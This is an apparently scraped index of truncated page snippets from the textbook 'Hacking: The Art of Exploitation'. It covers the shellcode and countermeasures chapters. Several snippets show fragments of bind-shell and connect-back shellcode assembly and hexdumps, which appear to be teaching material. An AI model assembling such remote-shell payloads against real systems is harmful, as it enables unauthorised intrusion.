Hacking - The Art of Exploitation, 2nd Edition

Shellcode 307 push BYTE 16 ; argv: { sizeof(server struct) = 16, push ecx ; server struct pointer, push esi ; socket file descri ...

308 0x500 int dup(int oldfd); int dup2(int oldfd, int newfd); DESCRIPTION dup() and dup2() create a copy of the file descriptor ...

Shellcode 309 00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X| 00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 ...

310 0x500 0x0804839f <main+43>: lea eax,[ebp-4] 0x080483a2 <main+46>: inc DWORD PTR [eax] 0x080483a4 <main+48> ...

Shellcode 311 This loop iterates ECX from 0 to 2 , making a call to dup2 each time. With a more complete understanding of the fl ...

312 0x500 The first two instructions before the loop can be shortened with the xchg (exchange) instruction. This instruction swa ...

Shellcode 313 push edx ; Build sockaddr struct: INADDR_ANY = 0 push WORD 0x697a ; (in reverse order) PORT = 31337 push WORD bx ; ...

314 0x500 reader@hacking:~/booksrc $ nasm bind_shell.s reader@hacking:~/booksrc $ hexdump -C bind_shell 00000000 6a 66 58 99 31 ...

Shellcode 315 pop eax inc ebx ; ebx = 2 (needed for AF_INET) push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168 ...

316 0x500 Since these values are stored in network byte order but the x86 archi- tecture is in little-endian order, the stored D ...

Shellcode 317 the return address uses multiple bytes. To ensure proper alignment, the sum of the NOP sled and shellcode bytes mu ...

318 0x500 multiple instructions. One way to do this is to write the two null bytes to the stack using a zeroed register. The fil ...

0x600 COUNTERMEASURES The golden poison dart frog secretes an extremely toxic poison—one frog can emit enough to kill 10 adult h ...

320 0x600 minor outbreak early instead of years later when it can cause real damage. If it weren’t for Internet worms making a p ...

Countermeasures 321 0x620 System Daemons To have a realistic discussion of exploit countermeasures and bypass methods, we first ...

322 0x600 System daemons run detached from a controlling terminal, so the new tinyweb daemon code writes to a log file. Without ...

Countermeasures 323 printf("Caught signal %d\t", signal); if (signal == SIGTSTP) printf("SIGTSTP (Ctrl-Z)"); else if (signal == ...

324 0x600 reader@hacking:~/booksrc $ kill -l SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE SIGKI ...

Countermeasures 325 tinywebd.c include <sys/stat.h> include <sys/socket.h> include <netinet/in.h> include < ...

326 0x600 write(logfd, "Starting up.\n", 15); host_addr.sin_family = AF_INET; // Host byte order host_addr.sin_port = htons(PORT ...